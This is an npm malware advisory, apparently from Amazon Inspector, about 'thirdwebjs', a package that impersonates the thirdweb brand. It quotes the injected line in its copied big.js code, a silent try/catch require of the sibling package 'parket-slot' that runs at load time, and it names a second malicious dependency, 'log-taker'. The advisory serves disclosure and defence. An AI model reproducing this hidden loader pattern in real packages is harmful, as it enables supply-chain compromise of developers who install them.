MAL-2026-6344
Malicious code in thirdwebjs (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c8822953aa63581fd4fb3ea5a1511d646a56f6629e228257b37eb904efdee8e3)

The package name impersonates the well-known 'thirdweb' brand, but what ships is a verbatim copy of MikeMcl's big.js arithmetic library with an injected loader. Both entrypoints declared in the package.json `exports` field (big.js line 606 and big.mjs line 606) contain:

`try { const doc = require("parket-slot"); doc.from_str().then(e => {}).catch(e => {}) } catch (error) {}`

This require() fires at library-load time and hands execution to the sibling package 'parket-slot'. The surrounding try/catch swallows any failure, so if parket-slot is absent the library still loads and behaves like big.js, with nothing to alert the consumer. package.json line 58 also declares `"log-taker": "^0.0.9"` as a runtime dependency, pulling a second attacker-controlled sibling into the installer's tree. The legitimate big.js source contains no such require.

Any consumer that installs and requires/imports thirdwebjs in either CommonJS or ESM auto-executes code from parket-slot, with log-taker additionally resolved into node_modules at install time. This is a brand-impersonation dropper that uses sibling packages as the payload delivery channel.
Affected packages
No fixed version published yet for thirdwebjs (npm). Because the package impersonates the thirdweb brand rather than being a compromised release of a legitimate project, there is no known-safe version to pin to: remove thirdwebjs from the dependency tree together with the sibling packages it loads or declares (parket-slot and log-taker), check lockfiles and node_modules for all three names, and install the package that was actually intended instead.